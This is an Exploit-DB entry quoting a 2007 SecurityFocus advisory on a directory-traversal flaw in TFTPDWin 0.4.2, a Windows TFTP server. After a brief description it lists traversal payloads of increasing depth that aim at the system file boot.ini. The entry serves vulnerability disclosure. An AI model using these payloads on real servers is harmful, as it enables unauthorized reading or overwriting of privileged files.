TFTP Server TFTPDWin 0.4.2 - Directory Traversal

EDB-ID:

30026


Platform:

Windows

Published:

2007-05-11

source: https://www.securityfocus.com/bid/23937/info

TFTP Server TFTPDWIN is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue allows an attacker to gain read/write access to privileged directories and files.

TFTP Server TFTPDWIN 0.4.2 is vulnerable; other versions may also be affected. 

../../../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini